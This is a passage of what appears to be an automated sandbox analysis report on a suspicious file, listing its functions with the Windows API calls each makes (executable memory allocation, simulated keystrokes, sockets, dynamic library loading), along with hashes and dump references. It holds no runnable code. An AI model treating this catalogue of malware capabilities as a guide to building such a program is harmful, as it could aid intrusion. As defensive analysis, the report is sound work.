                                                        • Instruction ID: 5a9f777dd7f90a5455b0915fef05820e49af34e79ac796d02f9fa981a59c46a6
                                                        • Opcode Fuzzy Hash: 65d796934ed2d8ff1895fea96d0b93bd15781d5c62d430fb844fa6ee91a07144
                                                        • Instruction Fuzzy Hash: E9D0E231520713EFD7209BB5D958A5A76E4AF06361F128D2AA4CADA290E770C8808A60
                                                        Function 00A993F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00A99009,?,00AAF910), ref: 00A99403
                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00A99415
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                        • API String ID: 2574300362-199464113
                                                        • Opcode ID: 1ad403faaa7fdc004b5f8722d370bd7922c9649973d2f7c57b93ae1da63a9227
                                                        • Instruction ID: 556774a509449102b27460e46189dedccf7389423df22f9e8738649f8b6098d1
                                                        • Opcode Fuzzy Hash: 1ad403faaa7fdc004b5f8722d370bd7922c9649973d2f7c57b93ae1da63a9227
                                                        • Instruction Fuzzy Hash: EAD0C730650713EFCB309FB4C98820372E4AF22352B00CC3EE482C2690E770C881CB20
                                                        Function 00A776C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d6eb62bb305d95bc6e74b94bc820e6f00b62956086e50566426f34adeb27c49c
                                                        • Instruction ID: 69f88e62a6941a9d4fb9c2210c04ec1ba069f25bcc167593b7ff8f06d9242603
                                                        • Opcode Fuzzy Hash: d6eb62bb305d95bc6e74b94bc820e6f00b62956086e50566426f34adeb27c49c
                                                        • Instruction Fuzzy Hash: A2C14B75A04216EFDB14CFA8CC84AAEB7B5FF48714B11C599E909EB251D730ED81CB90
                                                        Function 00A9E33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharLowerBuffW.USER32(?,?), ref: 00A9E3D2
                                                        • CharLowerBuffW.USER32(?,?), ref: 00A9E415
                                                          • Part of subcall function 00A9DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00A9DAD9
                                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00A9E615
                                                        • _memmove.LIBCMT ref: 00A9E628
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                                        • String ID:
                                                        • API String ID: 3659485706-0
                                                        • Opcode ID: 344cb161ca0ec18b7eb112a9f57b7ca59c7be5d67e8ed77541e338018a16c6a1
                                                        • Instruction ID: 7f1810586ed98ebb59361f68a2717d57d264d578b12c26580ed6b6299cb9cfbe
                                                        • Opcode Fuzzy Hash: 344cb161ca0ec18b7eb112a9f57b7ca59c7be5d67e8ed77541e338018a16c6a1
                                                        • Instruction Fuzzy Hash: F5C16B71A083119FCB14DF28C58096ABBE4FF88714F14896EF9999B352D731E946CF82
                                                        Function 00A983A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 00A983D8
                                                        • CoUninitialize.OLE32 ref: 00A983E3
                                                          • Part of subcall function 00A7DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00A7DAC5
                                                        • VariantInit.OLEAUT32(?), ref: 00A983EE
                                                        • VariantClear.OLEAUT32(?), ref: 00A986BF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                        • String ID:
                                                        • API String ID: 780911581-0
                                                        • Opcode ID: e185eb1b2e59992e559ef5882941f96cedcb023c84791fa48e0c79c0cde6e994
                                                        • Instruction ID: b37297e75d90661adb12b5ea10c9c3cd22c97ff2e6936625d0c858d27c683715
                                                        • Opcode Fuzzy Hash: e185eb1b2e59992e559ef5882941f96cedcb023c84791fa48e0c79c0cde6e994
                                                        • Instruction Fuzzy Hash: A3A159753047119FDB10DF28C981A2AB7E4BF89764F04485DFA9A9B3A1CB34ED44CB41
                                                        Function 00A77A78 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00AB2C7C,?), ref: 00A77C32
                                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00AB2C7C,?), ref: 00A77C4A
                                                        • CLSIDFromProgID.OLE32(?,?,00000000,00AAFB80,000000FF,?,00000000,00000800,00000000,?,00AB2C7C,?), ref: 00A77C6F
                                                        • _memcmp.LIBCMT ref: 00A77C90
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: FromProg$FreeTask_memcmp
                                                        • String ID:
                                                        • API String ID: 314563124-0
                                                        • Opcode ID: d447f75038b44017a8c9229b5917979889d4d19a067e491625257099ea4cc22f
                                                        • Instruction ID: 72f6aa00ee74743894bf166e6853345184b87658aa899ac4a60e71e2de23a67b
                                                        • Opcode Fuzzy Hash: d447f75038b44017a8c9229b5917979889d4d19a067e491625257099ea4cc22f
                                                        • Instruction Fuzzy Hash: 5B81FB75A00109EFCB05DFD4C984EEEB7B9FF89315F208598E516AB250DB71AE06CB60
                                                        Function 00A76DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Variant$AllocClearCopyInitString
                                                        • String ID:
                                                        • API String ID: 2808897238-0
                                                        • Opcode ID: 6715ce37d47028f423065908317c93e19c358aab65eea19074bf0fae4cb1deb9
                                                        • Instruction ID: ba24ca0ddf3eef70731d66eb63b71375e68de46fbcc3d35d796bf40ff5e2e314
                                                        • Opcode Fuzzy Hash: 6715ce37d47028f423065908317c93e19c358aab65eea19074bf0fae4cb1deb9
                                                        • Instruction Fuzzy Hash: 1251A4346087029ADB24AF79DC95B6EB3E5AF49310F20C82FE59ECB291DB709841DB11
                                                        Function 00A96CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 00A96CE4
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00A96CF4
                                                          • Part of subcall function 00A29997: __itow.LIBCMT ref: 00A299C2
                                                          • Part of subcall function 00A29997: __swprintf.LIBCMT ref: 00A29A0C
                                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00A96D58
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00A96D64
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$__itow__swprintfsocket
                                                        • String ID:
                                                        • API String ID: 2214342067-0
                                                        • Opcode ID: b636f026e8e7007a68a82c162898a483b9df4fe8608f33ccd6be97ae3c469527
                                                        • Instruction ID: 141b8e03ebdf05cceb1084acbfbdfeba7e4c76b96b71289b1641bdf7d531def1
                                                        • Opcode Fuzzy Hash: b636f026e8e7007a68a82c162898a483b9df4fe8608f33ccd6be97ae3c469527
                                                        • Instruction Fuzzy Hash: B041C574740610AFEB24AF68ED87F3A77E5DF08B10F448428FA599B2D2DB759C018B91
                                                        Function 00A9672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00AAF910), ref: 00A967BA
                                                        • _strlen.LIBCMT ref: 00A967EC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _strlen
                                                        • String ID:
                                                        • API String ID: 4218353326-0
                                                        • Opcode ID: 25fa23a9cbb9709be1ae48db7dba51f1d501fc8147f02e9d262c77c080d83128
                                                        • Instruction ID: c06072d7b3232069daacbdbe62f490842a8dbe5cdf0fd0e53c0d3f30881cccc0
                                                        • Opcode Fuzzy Hash: 25fa23a9cbb9709be1ae48db7dba51f1d501fc8147f02e9d262c77c080d83128
                                                        • Instruction Fuzzy Hash: A5418135A00114AFCF14EBA8DED5EAEB7E9AF48750F14C165F81A9B292DF30AD44CB50
                                                        Function 00A8BA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00A8BB09
                                                        • GetLastError.KERNEL32(?,00000000), ref: 00A8BB2F
                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00A8BB54
                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00A8BB80
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                        • String ID:
                                                        • API String ID: 3321077145-0
                                                        • Opcode ID: 4c21522149fd4a0db13f5c9fba0de35e880b7df1a576995cfcedb9e0212dfc22
                                                        • Instruction ID: f8ffd593315a3e7a6606703cf976a58ad4a3eacc5e1348178006aae744ae3ae7
                                                        • Opcode Fuzzy Hash: 4c21522149fd4a0db13f5c9fba0de35e880b7df1a576995cfcedb9e0212dfc22
                                                        • Instruction Fuzzy Hash: 13413B39600621DFDB11EF18D685A5EBBE1EF49720F098498E84A9B362CB31FD41CB91
                                                        Function 00AAADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ClientToScreen.USER32(?,?), ref: 00AAAE1A
                                                        • GetWindowRect.USER32(?,?), ref: 00AAAE90
                                                        • PtInRect.USER32(?,?,00AAC304), ref: 00AAAEA0
                                                        • MessageBeep.USER32(00000000), ref: 00AAAF11
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                        • String ID:
                                                        • API String ID: 1352109105-0
                                                        • Opcode ID: 779dce2f90a5f0dc2b222d2032ef3644abdef4e141d844a3af4d3cc7fdb1b9fd
                                                        • Instruction ID: 96ba86796b45a8252f9b8cb36a353f0d8ce4baa3fda7284ce11213b0818e2744
                                                        • Opcode Fuzzy Hash: 779dce2f90a5f0dc2b222d2032ef3644abdef4e141d844a3af4d3cc7fdb1b9fd
                                                        • Instruction Fuzzy Hash: 30419F70600229DFCB25CF98C884B6DBBF5FF6A740F1481A9E414CB291D731A802CF92
                                                        Function 00A80FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00A81037
                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00A81053
                                                        • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00A810B9
                                                        • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00A8110B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: KeyboardState$InputMessagePostSend
                                                        • String ID:
                                                        • API String ID: 432972143-0
                                                        • Opcode ID: ddd0777f98b669238b1772c19497749cdd85c695c9b9df895b8e04540527febe
                                                        • Instruction ID: f4792f3b2d52774c040d6f929bbcc7d93562e8a8f1538b6616b23a99324763ec
                                                        • Opcode Fuzzy Hash: ddd0777f98b669238b1772c19497749cdd85c695c9b9df895b8e04540527febe
                                                        • Instruction Fuzzy Hash: D6315830E40688AEFF34EBA58C09BFABBBDAB45311F08431AE584921D1C37589C79751
                                                        Function 00A81121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetKeyboardState.USER32(?,753DC0D0,?,00008000), ref: 00A81176
                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00A81192
                                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 00A811F1
                                                        • SendInput.USER32(00000001,?,0000001C,753DC0D0,?,00008000), ref: 00A81243
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: KeyboardState$InputMessagePostSend
                                                        • String ID:
                                                        • API String ID: 432972143-0
                                                        • Opcode ID: b0cb831998f6129903ce03ccf4f9332ba7edeab3daec3288b461dd0573300955
                                                        • Instruction ID: 836de8377719a86e54abd04fd726dacc64f0c24e149bd54933e79226df2ccf39
                                                        • Opcode Fuzzy Hash: b0cb831998f6129903ce03ccf4f9332ba7edeab3daec3288b461dd0573300955
                                                        • Instruction Fuzzy Hash: 38312870E406185EEF34FBA58C08BFA7BBEAB49310F04432EE585921D1D33449579791
                                                        Function 00A56415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00A5644B
                                                        • __isleadbyte_l.LIBCMT ref: 00A56479
                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00A564A7
                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00A564DD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                        • String ID:
                                                        • API String ID: 3058430110-0
                                                        • Opcode ID: f376b60a0aaede1d767612f36a8032cc4b939aaff4e93bcc59ef9fc6e5ce6347
                                                        • Instruction ID: 75311c39344984b6cfb9e7174d29076635692831897c357f0d3a21d2f78eaca5
                                                        • Opcode Fuzzy Hash: f376b60a0aaede1d767612f36a8032cc4b939aaff4e93bcc59ef9fc6e5ce6347
                                                        • Instruction Fuzzy Hash: 2E31E131600246AFDF21CF75CA44BBA7BB5FF41312F554129EC54871A1E731D899DB90
                                                        Function 00AA5175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetForegroundWindow.USER32 ref: 00AA5189
                                                          • Part of subcall function 00A8387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00A83897
                                                          • Part of subcall function 00A8387D: GetCurrentThreadId.KERNEL32 ref: 00A8389E
                                                          • Part of subcall function 00A8387D: AttachThreadInput.USER32(00000000,?,00A852A7), ref: 00A838A5
                                                        • GetCaretPos.USER32(?), ref: 00AA519A
                                                        • ClientToScreen.USER32(00000000,?), ref: 00AA51D5
                                                        • GetForegroundWindow.USER32 ref: 00AA51DB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                        • String ID:
                                                        • API String ID: 2759813231-0
                                                        • Opcode ID: ad9d66df3c4d973ade1eec3bacfca077846e82c8d92000c31f67b24d0e4ae68b
                                                        • Instruction ID: 1fc7b6289596bda04a6aaceb37281411666e17d880ac585cbd81b20b1b0a6bf4
                                                        • Opcode Fuzzy Hash: ad9d66df3c4d973ade1eec3bacfca077846e82c8d92000c31f67b24d0e4ae68b
                                                        • Instruction Fuzzy Hash: 1E310F72D00118AFDB04EFA9D945DEFB7F9EF99700F10406AE415E7241DA759E05CBA0
                                                        Function 00AAC788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A22612: GetWindowLongW.USER32(?,000000EB), ref: 00A22623
                                                        • GetCursorPos.USER32(?), ref: 00AAC7C2
                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00A5BBFB,?,?,?,?,?), ref: 00AAC7D7
                                                        • GetCursorPos.USER32(?), ref: 00AAC824
                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00A5BBFB,?,?,?), ref: 00AAC85E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                        • String ID:
                                                        • API String ID: 2864067406-0
                                                        • Opcode ID: 40a83e7b4ba2ed164493e19900aefefa2f7242e134c64a7d06040dbbfb1d796d
                                                        • Instruction ID: efd977a38ecd46c0f4fef52c39a3765e77691190e43c82e8939871adecf1438d
                                                        • Opcode Fuzzy Hash: 40a83e7b4ba2ed164493e19900aefefa2f7242e134c64a7d06040dbbfb1d796d
                                                        • Instruction Fuzzy Hash: E2319439600018EFDB15CF98C898EEA7BB6FB4E720F044069F9058B2A1D7359D51DFA0
                                                        Function 00A78B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
